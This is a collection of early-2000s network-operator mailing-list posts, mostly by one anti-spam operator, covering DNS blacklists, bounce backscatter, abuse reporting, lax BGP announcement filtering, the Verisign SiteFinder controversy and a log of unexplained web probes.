On Sunday, January 04, 2004 4:43 PM [GMT-5=EST], Roger Marquis [EMAIL PROTECTED] wrote: If UCE happens to contain a forged sender of roble.com, would you consider that even remotely useful in a filter? Yes. Roble manages several email gateways for companies other than ourselves and we've found that rejecting invalid domains and senders is an indispensable component of spam filtering. Not only is it effective it is also 100% false-positive proof (so far). But, it has to be done carefully. Our RHSBL (part of the AHBL) is based on this idea - but, we are extremely careful in what we block exactly. A single wrong block (aol.com for example) could have really bad side affects for anyone using the list. As such, the best way to use a domain style block is to try and only use it on the mainsleeze spammers for example, that spam from their (many) domains they own. We had to do this with topic's spammy domains in order to allow our users to keep getting messages from mailing lists hosted off of topica's main domain. Each type of blacklisting has to be carefully thought out, and implemented correctly. A combination of a DNSbl, a RHSbl, a whitelist, and something similar to spamassassin gives you the flexability to block alot of spam without needing to block everything outright. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Automated Network Abuse Reporting
On Monday, December 29, 2003 11:24 AM [GMT-5=EST], Joel Jaeggli [EMAIL PROTECTED] wrote: if you automate abuse reporting you can basically assume that the reciver will automate abuse handling. since that has in fact happened as far as i can tell the probably of you automated asbuse replaies ever reaching a human who cares or can do something about it is effecetivly zero. Most likely, automated abuse reports will be treated like abuse reports from users with those lovely software firewalls that whine all the time that their ISP's nameserver is trying to hack them on port 53 (IE: thrown in with the rest of the reports in the round filing cabinet on the floor next to the desk). I refused to accept automated abuse reports of probes or similar when I was an ISP netadmin. Portscans/pingscans/etc are not illegal (and I've seen this sucessfully proven in court at least once). They are illegal if you use it to bring down someone's machine though. Basically, if I were you, I'd turn your firewall's sensitivity WAY down and only track events that are obviously attempts to hack. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: a note to those who would automate their rejection notices
On Saturday, December 27, 2003 3:23 PM [GMT-5=EST], Paul Vixie [EMAIL PROTECTED] wrote: Anyway, I hope folks will stop sending automated rejection notices to domains who were not involved, other than by forgery, in the transmission of a virus or spam. In other words, there's relevant operational content in this thread, and when fighting spam it would be reasonable to avoid hurting uninvolved third parties. AOL, please listen. Cox in particular was doing this until recently (we got their attention rather quickly after blacklisting their main mail servers). We were being joe jobbed badly, and cox's mail servers were generating massive amounts of bounces per minute, and out of all the bounces, cox was generating the most (at least 3/4 of them) The result was that each one of their mail servers (more then a dozen) was sending one bounce per connection, and launching anywhere between 5-12 connections at a time, then reconnecting right away after sending the single bounce and disconnecting. We quickly ran out of connection slots on both the primary and secondary mail spoolers, leaving us unable to get incoming mail until we firewalled out cox's mail servers. One would think, if your going to run a cluster of mail servers to handle your mail, that you would rate limit your bounces so that people (like myself) who can't afford to have a dozen or more heavy duty mail servers don't end up getting DoS'd by your mail server's ability to pump out millions of messages per hour. Someone said on one of the newsgroups, Well, maybe they setup their system correctly, and don't see a need to change something that works. The problem is, theres a difference between properly configuring a mail server and responsibly configuring a mail server. When you responsibly configure a mail server, you take into account OTHER people's systems and how THEY will be able to deal with your server. Part of the issue comes with when you accept a mail, then bounce afterwards, instead of just bouncing after RCPT TO: or DATA. When you delay the bounce, you will generate a bounce to the From: address, even if it is forged. When you outright reject the message, you pretty much reduce the risk of that happening by far, as the sending server will see that the message was rejected, and hopefully move on. Now, this works with open proxies, but not with open relays. Do spammers use open relays much anymore? No, not really. Why leave a trail back to yourself when you can hide completely? AOL has _not_ done this to us though, we've seen maybe one or two bounces from AOL's servers, but nothing even remotely close to what Cox is doing. Just my thoughts, flame away :) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Happy Holiday Wishes
Merry Christmas and happy holidays! Lets hope the coming year is good for everyone (except the spammers that is :-) Off I go to help my mother learn how to use the new digital camera I gave her for christmas! -- Brian BrunsThe Summit Open Source Development GroupOpen Solutions For A Closed World / Anti-Spam Resourceshttp://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Henry Linneweh To: Braun, Mike ; NANOG Sent: Thursday, December 25, 2003 5:46 AM Subject: Re: Happy Holiday Wishes Merry Christmas All and Happy New Year -Henry"Braun, Mike" [EMAIL PROTECTED] wrote: To all on Nanog, Have a happy holiday season and a great new year :-) Mike Braun "MMS firstam.com" made the followingannotations on 12/24/2003 11:22:29 AM--"THIS E-MAIL MESSAGE AND ANY FILES TRANSMITTED HEREWITH, ARE INTENDED SOLELY FOR THE USE OF THE INDIVIDUAL(S) ADDRESSED AND MAY CONTAIN CONFIDENTIAL, PROPRIETARY OR PRIVILEGED INFORMATION. IF YOU ARE NOT THE ADDRESSEE INDICATED IN THIS MESSAGE (OR RESPONSIBLE FOR DELIVERY OF THIS MESSAGE TO SUCH PERSON) YOU MAY NOT REVIEW, USE, DISCLOSE OR DISTRIBUTE THIS MESSAGE OR ANY FILES TRANSMITTED HEREWITH. IF YOU RECEIVE THIS MESSAGE IN ERROR, PLEASE CONTACT THE SENDER BY REPLY E-MAIL AND DELETE THIS MESSAGE AND ALL COPIES OF IT FROM YOUR SYSTEM."==
RoadRunner contact
Hello all, I dont suppose anyone here might have a direct contact for the people at Road Runner in regards to DNS management and/or their abuse desk? Contact me off-list please. Thanks. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: SPAM from own customers
- Original Message - From: Suresh Ramasubramanian [EMAIL PROTECTED] To: Michel Renfer [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, December 02, 2003 2:23 PM Subject: Re: SPAM from own customers Virus filtering Rate limit (+ script to auto terminate user) and smtp auth on outbounds SMTP AUTH is becoming risky if its not carefully setup and monitored. I can name one big time spammer who has warmed up to cracking weak passwords on e-mail systems that do SMTP AUTH. Means you'd have to filter your outbound mail servers port 25 from anyone not inside your network or a trusted source. Virus filtering is a must, but, alas, not all mail servers filter *outgoing* mail. Most filter only incoming mail. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Anit-Virus help for all of us??????
- Original Message - From: Vivien M. [EMAIL PROTECTED] To: 'Daniel Karrenberg' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, November 25, 2003 9:39 AM Subject: RE: Anit-Virus help for all of us?? Have either of you actually followed this advice? Win98SE is totally useless as a desktop OS due to the archaic GDI/USER resource limits. When one average consumerish app (eg: a media player) eats up 10% of those resources, one window in an IM program eats up 2%, etc... it does not take much to bring down an entire system. Last time I was running Win98SE (which is about 3 years ago), it took about 20 minutes after booting while running boring normal apps to get to a dangerously low resource level (30%ish free). That machine got totally unstable needing a reboot after about 3 days. On the same hardware (with additional RAM), Win2K could easily run 3-4 weeks and run any app I wanted just fine. So, some people might say I'm a power user, but the average users I know these days tend to multitask at least a web browser, an IM client with a couple open windows, some bloated media player, perhaps a P2P app, and some office app. This is already stretching Win9X to its limits, and I would expect it to be worse (code just gets sloppier...) than it was three years ago... Yes I do follow my own advice. Back from the days when I was an OEM, I still have a box full of win98SE cd packs/licenses for when I build people new machines. Its what I put on them standard unless you ask for Win2k or XP or NT4 (or any other OS for that matter, ie Linux, BSD). I know full well about the resource limits. Its a PITA, but as long as you run a decent set of apps that don't suffer from resource leaks (Mozilla without a GDI patch does this for example) that eventually use up all GDI/USER memory, you'll be fine. I use Win98SE here all day with only one reboot needed most days, and I run WinAMP, Putty, K-Meleon, Outlook Express, Cygwin, mIRC, Xnews (which has a bad habit of crashing the whole system at times), as well as AIM, Miranda IM, SST, Yahoo Messenger, and various other tools. Thats all at once, multitasking. I know, I could reduce the clutter by letting Miranda IM do AIM and Yahoo, but thats not the point. :-) Many times, resource suckage comes from those ugly faceless background programs that run at startup. Kill as many icons as you can on the desktop and the task bar, and clean out your startup list, and you'll free up alot of GDI resources. No wonder people think Windows is unreliable. 98SE may be preferable from a security-from-external-threats POV, yes, but for any type of real use, it's useless. Not to mention the other quirks, like needing to reboot to change network settings, the lack of any local security (or even attempt at local security), etc. I'll take rebooting every week or two for the latest XP security patch any day over rebooting every day or two because Win98SE is an unreliable piece of poorly designed legacy junk. The way I see it, there are two uses for 98SE (or 95, 98, Me, etc) in the modern world: 1) People who use their computers as game-only machines (or who dual boot a real OS for non-game purposes) 2) Advertising for $OTHER_OS, where $OTHER_OS can be Win2K, XP, or your favourite Linux distro with KDE, GNOME, etc. Anything that actually WORKS reliably. Lets not forget those people who just don't have the CPU power or memory to support 2k or XP. Just because something is new and 'improved' doesn't make it better. Yes, 9x has alot of legacy crap. Yes, 9x has various issues with resource usage. But sometimes, its just right. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: Anit-Virus help for all of us??????
now) with all the important options turned on, has the option of downloading a list of latest patches from our web server, and then downloads them from microsoft (regardless of if it was installed already, as I have found that sometimes Windows Update thinks a patch is installed, when its really not), then quietly installs them without user interaction, then forces the user to reboot. Its got some 'issues' in its current implementation, so I'm not comfortable with releasing it into the wild for people yet. That and the fact it only works on XP. It isn't *that* hard to put something together for your less cluefull customers, as long as they agree to some sort of release of liability before running it. Not always possible, but who knows. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: RBLs in use
I run the Abusive Hosts Blocking List (http://www.ahbl.org). We list everything from spam sources, to spam supporters, open proxies, open relays, drones, etc. Its in use on all of the mail servers I help administrate (which includes several fortune 500 companies, half a dozen regional ISPs, and several .edu sites), plus SpamHaus, SpamCop BL, SORBS, EasyNet, and several others, which help balance out protection. A good list of all known ones is up at: http://www.declude.com/junkmail/support/ip4r.htm The only DNSbl which you really should avoid like the plague is the XBL (which I believe is gone at this point). In the various places where I've gotten a look at their spam protection, SpamHaus is very popular, as is SpamCop's BL. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Paul S. Brown [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, November 20, 2003 10:16 AM Subject: RBLs in use I have been asked to find out what DNSBLs are in use so my employer can see what the incidence of its being blacklisted is and how much impact this is likely to have had on their business. What DNSBLs are being used by the various agencies represented on NANOG and how much weighting do you give them. Are there any DNSBLs you would completely ignore due to data quality issues? Thanks Paul
Re: Email security issues
This is one of those times where either PGP/GPG or these digital ID things in Outlook/Outlook Express would come in handy. Not that I would expect normal users to bother to check to see if the sig is legit or not, considering these are the same people who seem to have no problem opening a zip file and running an exe in it (ala MiMail). -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: Daniel Roesen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 10, 2003 2:30 PM Subject: Re: Email security issues On Mon, Nov 10, 2003 at 01:10:42PM -0600, Adi Linden wrote: I've just receives a nice email from my banker (ok, it claims to be from my banker) asking me to visit my banks website and confirm my email address. This email is by far the most convincing piece of fraud I received to date so far. The URL loads up the bank page plus a popup provoding a login. Looking at the source of the popup it revels that it is positively not a legit source and most likely used to harvest peoples access information. Yep, got the same one. Quite a good fake. Even the faked Received: line has an IP from an IP block of this bank. The only technical thing which I saw when taking a quick look which showed the fake was the .edu relay inbetween. Best regards, Daniel
Re: Hijacked IP space.
- Original Message - From: Joe Abley [EMAIL PROTECTED] To: Randy Bush [EMAIL PROTECTED] Cc: Bill Woodcock [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, November 04, 2003 10:17 AM Subject: Re: Hijacked IP space. How should your peers certify that the routes you announce are reasonable for them to receive? Still doesn't solve the problem of ISPs announcing out hijacked blocks. It is stupidly simple to announce out blocks you don't own. A few years ago, when I was a netadmin, we on several occasions announced out blocks we had no permission to announce out (/24s). This happened on the days after 9/11 as well when we acquired customers who's ISPs didn't survive the collapse of the NYC telco network. All it took was using the BGP request form at a large unnamed Tier 1 backbone provider, and our filters were adjusted to allow us to announce out any network we wanted to. No questions asked, no authorization forms, nothing. I've confirmed this behavior with several of the backbones. Why are these backbones allowing their T1 customers to make these kind of announcements without any kind of authorization forms or simple checking to see if its a valid announcement for that customer? -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org
Re: [Full-Disclosure] Gates: 'You don't need perfect code' for good security
http://groups.google.com/groups?hl=enlr=ie=UTF-8selm=Xns94258238F273Cbruns2mbitcom%40130.133.1.4 From my post to the NANAE newsgroup... My favorite quote is... BG: Until we had this concept of Web services, software on the Internet couldn't talk to other software on the Internet. The only thing that worked was you could move bits - that's TCP/IP - or you could put up screens - that's HTML - but software couldn't talk to software. Its good to know my Putty application can't talk to my OpenSSH server, or that my EXIM mail server can't actually talk to other mail servers. :-) -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org The AHBL - http://www.ahbl.org - Original Message - From: james [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 5:00 PM Subject: Fw: [Full-Disclosure] Gates: 'You don't need perfect code' for good security One word HA ! james - Original Message - From: Jeremiah Cornelius To: [EMAIL PROTECTED] Sent: Friday, October 31, 2003 11:32 AM Subject: [Full-Disclosure] Gates: 'You don't need perfect code' for good security : -BEGIN PGP SIGNED MESSAGE- : Hash: SHA1 : : FLAME ON! : : http://www.itbusiness.ca/index.asp?theaction=61sid=53897 : : But there are two other techniques: one is called firewalling and the other : is called keeping the software up to date. None of these problems (viruses : and worms) happened to people who did either one of those things. If you had : your firewall set up the right way - and when I say firewall I include : scanning e-mail and scanning file transfer -- you wouldn't have had a : problem. But did we have the tools that made that easy and automatic and that : you could really audit that you had done it? No. Microsoft in particular and : the industry in general didn't have it. : : The second is just the updating thing. Anybody who kept their software up to : date didn't run into any of those problems, because the fixes preceded the : exploit. Now the times between when the vulnerability was published and when : somebody has exploited it, those have been going down, but in every case at : this stage we've had the fix out before the exploit. So next is making it : easy to do the updating, not for general features but just for the very few : critical security things, and then reducing the size of those patches, and : reducing the frequency of the patches, which gets you back to the code : quality issues. We have to bring these things to bear, and the very dramatic : things that we can do in the short term have to do with the firewalls and the : updating infrastructure. : -BEGIN PGP SIGNATURE- : Version: GnuPG v1.2.3 (GNU/Linux) : : iD8DBQE/oqq3Ji2cv3XsiSARAlkdAJ0aGkBViYkoE193iZycTmQZohzwbQCg1KDA : SjPLY1EEzamQCtIGKwJT1Vk= : =mIsY : -END PGP SIGNATURE- : : ___ : Full-Disclosure - We believe in it. : Charter: http://lists.netsys.com/full-disclosure-charter.html James Edwards Routing and Security Administrator [EMAIL PROTECTED] At the Santa Fe Office: Internet at Cyber Mesa Store hours: 9-6 Monday through Friday 505-988-9200 SIP:1(747)669-1965
Re: ISPs' willingness to take action
Believe it or not, there are. When I ran a large network at an unnamed ISP, we ran graphing on certain types of traffic, and an awful lot of our business customers were doing this - with their home users accessing their corp exchange servers with no VPN. The only thing I could guess is that they weren't willing to hire someone to do things right. There were certain situations why I had to do this personally. At the time, when I took over, there was no Exchange admin, and I was rather clueless on how to manage Exchange, so for quite a while I stumbled through trying to get things working correctly and properly securing it (and several times severely broke it). It was several months before I felt comfortable adjusting the main setup of the server so that it would work fine on my VPN hookup from the office network to the house. Its alot different now that I am familiar with Exchange. I was trying to get rid of exchange, but with the fact our corp office was a bunch of idiots who had no idea how to use anything else but outlook, made it nearly impossible to switch to a pure pop3/smtp setup with an online calendar and shared address book. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: Stewart, William C (Bill), RTSLS [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 27, 2003 1:27 AM Subject: Re: ISPs' willingness to take action Brian Bruns asserts that there are lots of home users connecting to their office Exchange servers without VPNs, and that therefore blocking the Microsoft ports was bad. While I agree with his point that you shouldn't do it without documenting what you are or are not blocking, I'm really surprised to hear the assertion that people are leaving unfirewalled Exchange servers out on the net. Is this actually common?/shudders...
Re: ISPs' willingness to take action
Yeah, but what happens is when you use the web based interface and non-outlook pop3/imap/smtp clients is that you lose access to things like shared address books, shared calendars and other things which these people depend on. At least, from what I remember, Exchange 5.5 lacked these features via the web based interface. Might be different now. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: [EMAIL PROTECTED] To: NANOG [EMAIL PROTECTED] Sent: Monday, October 27, 2003 9:52 AM Subject: RE: ISPs' willingness to take action VPN technologies are either too weak, like PPTP, too expensive or difficult to grasp like IPsec, or too new like the HTTPS tunnels. A couple of years ago, I was working at a company that used Exchange for corporate email. They had a web version of Outlook that, I believe, was part of Exchange server. It is almost a no-brainer to put that up on an HTTPS server. Due to the prevalence of online shopping and banking, even relatively clueless users understand how to look for the secure web browsing icon (key or lock). This is reasonably strong security, cheap to implement and easy to grasp. It's also been proven for almost 10 years now. And if you don't like Outlook's web version, there is always one of the many web email packages like SquirrelMail http://www.squirrelmail.org/ which can use IMAP or POP (both supported on Exchange server) and which can be secured via SSL/HTTPS. Somebody oughta sell a secure email box that plugs in between the Exchange server and the network and includes a secure SMTP server relay, secure POP server, secure IMAP server and secure web email interface. No doubt somebody already supplies boxes like this, and ISPs just have to start reselling them. I don't recall the source, but it was recently reported that 40% of the exchange server base is still on the v5.5 platform. Using that as a general indication, many of these shops probably won't plan to upgrade anytime soon. According to Google, Exchange 5.5 does both POP and IMAP so the possibility of secure web mail service is there. Seems to me that you could sell some service and educate the users about safe email practices at the same time. --Michael Dillon
Re: ISPs' willingness to take action
- Original Message - From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, October 26, 2003 8:01 PM Subject: ISPs' willingness to take action By the way, can anybody explain to me a legitimate use for port 135/137 traffic across the Internet, like it's somebody's private LAN? Seems to me anybody who still thinks that's legitimate is living in the past. So, the big question: why don't ISPs do more of this? Are they afraid of client reaction? Doesn't wash, for me: most clients would be highly grateful, and all it really takes for the remainder is fair warning. Cost? Again, you can judge for yourselves how low the fruit you choose to pick; the biggest gains have the best ROI. Happy clients, liberated bandwidth, faster servers -- what's to loose? Problem is, some applications, like Outlook for example (if I remember correctly), like to use the 135, 137, 139 and others to connect to the Exchange server. You block them, and it will start to croak. You have alot of home users not using a VPN to connect to their office exchange servers. I used to do this myself at times. When you sell a service to someone, and neglect to mention you block certain incoming ports, especially to a possible business user or home user trying to access their office, you put yourself in a really bad position. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: opinions on the com/net wildcard issue
Your results look a hell of alot more realistic then what Verisign tried to get people to swallow at SECSAC. Too bad they won't take it seriously because its 'obviously biased' :-/ -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: Paul Vixie [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 23, 2003 10:07 PM Subject: opinions on the com/net wildcard issue my survey is over. see http://sa.vix.com/~vixie/comnetsurv/ for the results.
Re: Heads-up: ATT apparently going to whitelist-only inbound mail
I'm getting nothing but timeouts at this point to any of att's mail servers. Nothing going through at all. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511 - Original Message - From: Marshall Eubanks [EMAIL PROTECTED] To: Mike Tancsa [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Tuesday, October 21, 2003 5:57 PM Subject: Re: Heads-up: ATT apparently going to whitelist-only inbound mail Here is my experience (names are changed to protect...) : Failed to deliver to '[EMAIL PROTECTED]' SMTP module(domain att.com) reports: message text rejected by ckmsi2.att.com: 550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3] Failed to deliver to '[EMAIL PROTECTED]' SMTP module(domain att.com) reports: message text rejected by ckmsi2.att.com: 550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3] Failed to deliver to '[EMAIL PROTECTED]' SMTP module(domain att.com) reports: message text rejected by ckmsi2.att.com: 550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3] Failed to deliver to '[EMAIL PROTECTED]' SMTP module(domain att.com) reports: message text rejected by ckmsi2.att.com: 550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3] Failed to deliver to '[EMAIL PROTECTED]' SMTP module(domain att.com) reports: message text rejected by ckmsi2.att.com: 550 5.7.1 Your message was rejected as possible spam. Please call your ATT contact. [3] On Tuesday, October 21, 2003, at 05:46 PM, Mike Tancsa wrote: Wow, this sounds like a pretty extreme shotgun approach. (or is it April 1st somewhere). Is ATT going to make this whitelist publicly available ? Perhaps if there was some global white list that everyone could consult against, it might be a little more useable. Still, what do you do about multi-stage relays ? ---Mike
Unusual GET requests
Hmmm, this is probably offtopic, but I can't seem to find anything online which explains this and I've never seen it before. Maybe someone else here has seen this in their logs or has any idea what would do this? Its obviously trying to gather some sort of information, could it be a prelude to some sort of DoS or exploit thats not publically known yet? 68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /pad-Files HTTP/1.1 404 322 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /PAD-FILES HTTP/1.1 404 322 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:49 -0500] GET /Pad-Files HTTP/1.1 404 322 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /Pad-files HTTP/1.1 404 322 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /pad-files HTTP/1.1 404 322 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /PAD-FILE HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:48 -0500] GET /Pad-file HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:47 -0500] GET /pad-File HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:47 -0500] GET /Pad-File HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /PadFiles HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /Padfiles HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /PADFILES HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:44 -0500] GET /padfiles HTTP/1.1 404 321 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PadFile HTTP/1.1 404 320 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /Padfile HTTP/1.1 404 320 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PADFILE HTTP/1.1 404 320 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /padfile HTTP/1.1 404 320 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /Pads HTTP/1.1 404 317 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:43 -0500] GET /PADS HTTP/1.1 404 317 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /pads HTTP/1.1 404 317 - libwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /Pad HTTP/1.1 404 316 - l ibwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /PAD HTTP/1.1 404 316 - l ibwww-perl/5.65 68.63.88.173 - - [21/Oct/2003:19:47:42 -0500] GET /pad HTTP/1.1 404 316 - l ibwww-perl/5.65 -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: False information: CEO of Versign facts are wrong
- Original Message - From: Sean Donelan [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 17, 2003 8:26 AM Subject: False information: CEO of Versign facts are wrong http://news.com.com/2008-7347-5092590.html Quotes Stratton Sclavos: The DDOS (distributed denial-of-service) attacks last October on the root system--hey, there are 13 global copies of that, and they're all operating. It should scare people that nine of the 13 went down. It's time for the Internet infrastructure to go commercial. On the core services of the infrastructure, it's time to pull the root servers away from volunteers who run them out of a university or lab or some other level. That's going to be an unpopular decision. Methinks that one comment is going to make them even more hated then Microsoft or SCO (who both rank right up there with being universally despised on the Internet). They are digging themselves a grave thats a few miles deep. Lets hope ICANN sees this and makes the right decision on how to deal with this growing problem. I'm going to play journalist for a while and make some calls. I'll let you know what kind of 'official' statements I can drag out of these idiots. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: False information: CEO of Versign facts are wrong
I'm going to play journalist for a while and make some calls. Ok, first part of my mission is a success. I spoke with a Jim Hock from Bite Communications (Verisign's PR firm), very nice conversation, started out with Verisign's concerns, then we spoke a little bit on the issues people have brought up here. He will be comminicating with me over the next week or so, as well as putting me in touch with some technical people there. So here is where I need your guys help. Put together a list of questions, comments, etc that you feel are appropriate (about the general issues of verisign, its implementation of sitefinder, its handling of the root servers, and other things of importance) in an e-mail to me and send it off. I'll compile a list of questions and pose them to the people I talk to. Don't worry, unless you ask me to, I won't mention who these questions are from. I'm not siding with Verisign on this issue - not by far. But one thing that I discussed with my admins today was the need for better communication between Verisign and the tech community. Thus, I'm going to put aside my misgivings about the past with them and try to hopefully open a worthwhile dialog between everyone who wants to be heard. Verisign has admitted they made mistakes in their handling of the issue, and it sounds like they want to try to do things right this time. ICANN has a job to do, and I'm sure they will do the right thing, but there is a rift forming between the community and Verisign, and thats not going to help the situation at all. You all may not like me, or agree with me, but this is hopefully an oppertunity where you can get some of your voices heard outside of an official process like the SECSAC, and that might result in a better understanding on both sides. I will of course keep everyone who wants to know up on how things are going and what I talk about with them, and you are all welcome to comment to me about anything. The worst that can happen is that we get nowhere with talking and everyone is still divied with nothing accomplished. But, heres to hoping that something good might come out of this. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: Pitfalls of annoucing /24s
- Original Message - From: Ejay Hire [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Friday, October 17, 2003 5:54 PM Subject: RE: Pitfalls of annoucing /24s Am I the only one that has never had an issue multihoming with /24's? Nope, Most of the networks I've run are basically nothing but blocks of /24 announcements out of a larger /20 or whatever size block that has been assigned. In fact, it was alot easier for me to handle the network in that fashion, because I could easily control where traffic for a specific use came in, etc. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
SECSAC Meeting on Verisign Sitefinder Service
http://media.icann.org/ramgen/encoder/secsac.rm Live feed of the meeting. Having listened to just about 5 minutes so far, Verisign is fudging quite a bit on how many people like the sitefinder service. Its almost unreal to hear what they are saying. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: abuse from a user of this list
- Original Message - From: Booth, Michael (ENG) [EMAIL PROTECTED] To: William Allen Simpson [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Monday, October 13, 2003 7:18 AM Subject: Re: abuse from a user of this list I didn't draw that conclusion at all. Much the opposite, judging from their photo gallery, they seem like a bunch of script kiddies trying to make a name for themselves in the open source community, while bumming around for jobs, and doing hosting on their Ameritech DSL in blatant violation of their AUP (any guys from SBC on this list?). I wouldn't take them seriously. Have a listen to http://www.poptix.net/trelane.mp3 for proof of their maturity. Calling someone and telling them to get a life, in response to a NANOG post, is like a parapalegic telling me I walk funny. I aint even going to get in the middle of the spat between poptix and trelane. Thats their fight, not mine. I suggest everyone else butt out of the situation as well. Now, I _do_ take offense to being called a script kiddie. I've been doing development for more then 7 years in various projects under various aliases. I have never once resorted to the tactics and methods of those who attack EFNet servers, SPEWS, Sorbs, Osirusoft, etc. In fact, most of the people who have been attacked are good friends of mine, and I've been working in very great detail and using what limited resources and staff we have to help these people. With no funding, yeah, we can't match the larger security groups or companies, but we've survived hell and back and are still standing on our own feet. People have yet to learn that we help others because we like to, because its the right thing, and because this world is seriously lacking in good guys. We are a group made up of many cultures, from developers, to end users, to gamers (which is why we were one of the biggest sponosors of one of the largest gaming competitions in sweden). Just because we don't make public everything we do doesn't mean we don't exist or haven't done good things. I'm tired of this, I really am. My family is upset at the growing amount of harassment, and thats dragging me farther and farther into this mess. I have enough health problems to begin with. On the Ameritech/SBC AUP issue, the only thing I have to say is that we have a business class DSL line, which is specifically for situations like what we are doing. Its apparent that we are disliked here by some, but hitting below the belt by going after our provider isn't going to solve anything or change anything. -- Brian Bruns The Summit Open Source Development Group Open Solutions For A Closed World / Anti-Spam Resources http://www.sosdg.org ICQ: 8077511
Re: Abuse Departments
